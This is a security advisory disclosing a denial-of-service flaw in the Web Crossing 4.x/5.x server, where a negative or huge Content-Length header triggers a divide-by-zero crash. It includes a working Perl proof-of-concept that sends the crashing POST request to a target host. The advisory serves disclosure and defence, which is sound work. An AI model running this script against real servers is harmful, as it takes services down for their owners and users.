Web Crossing 4.x/5.x Denial of Service Vulnerability ################################################### Credit: Author : Peter Winter-Smith Software: Package : Web Crossing Versions : 4.x/5.x Vendor : WebCrossing, Inc. Vendor Url : http://www.webcrossing.com/ Vulnerability: Bug Type : Denial of Service Severity : Less Critical 1. Description of Software "Web Crossing is the world's leading collaboration server platform, offering complete solutions including discussion groups/bulletin boards, integrated newsgroups and mailing lists, full email services, calendar services, real-time chats, live events and full web application programming features, complete cross-platform compatibility, and distributed/mirrored serving for ultimate scaleability." - Vendors Description 2. Bug Information (a). Denial of Service When an HTTP POST request is made to Web Crossing's built-in server application (default port 80/tcp), if the 'Content-Length' header supplied with the request is an extremely large or negative number, the server will encounter a set of instructions which lead to an integer-divide-by- zero problem, immediately crashing the server and denying any further service. The offending instruction is located at 0090121F: 0090121F F7F9 IDIV ECX 3. Proof of Concept The following perl script should crash any Web Crossing BBS using the built-in server application for hosting: ######################################################################### #!/usr/bin/perl -w # # Web Crossing 4.x\5.x Denial of Service Exploit # [ Bad 'Content-Length' Header Bug ] # # - by Peter Winter-Smith [peter4020@hotmail.com] use IO::Socket; if(!($ARGV[0])) { print "Usage: wxdos.pl \n"; exit; } print "Web Crossing 4.x\\5.x Denial of Service Exploit\n" . "\t[ Bad 'Content-Length' Header Bug ]\n" . "\t[peter4020\@hotmail.com]\n\n"; $victim = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>$ARGV[0], PeerPort=>"80") or die "Unable to connect to $ARGV[0] on " . "port 80"; $DoS = "POST / HTTP/1.1\r\n" . "Content-Length: -1\r\n\r\n"; print $victim $DoS; print "[+] Evil request made to target server ... Waiting...!\n"; sleep(4); close($victim); print "[+] Done!\n"; exit; ######################################################################### 4. Patches - Workarounds Although I was able to contact the Web Crossing support staff, when the investigation into this flaw was handed over to the development team all contact was lost with both them and the support staff and my emails were no-longer answered. I have decided to release this information so that users of Web Crossing can decide what would be a suitable course of action for protecting their systems from this bug. No vendor supplied patches exist, I would recommend that filtering of the 'Content-Length' header is put into action via some third party application if at all possible. 5. Credits The discovery, analysis and exploitation of this flaw is a result of research carried out by Peter Winter-Smith. I would ask that you do not regard any of the analysis to be 'set in stone', and that if investigating this flaw you back trace the steps detailed earlier for yourself. Greets and thanks to: David and Mark Litchfield, JJ Gray (Nexus), Todd and all the packetstorm crew, Luigi Auriemma, Bahaa Naamneh, sean(gilbert(perlboy)), pv8man, nick k., Joel J. and Martine. o This document should be mirrored at http://www.elitehaven.net/webxdos.txt _________________________________________________________________ Sign-up for a FREE BT Broadband connection today! http://www.msn.co.uk/specials/btbroadband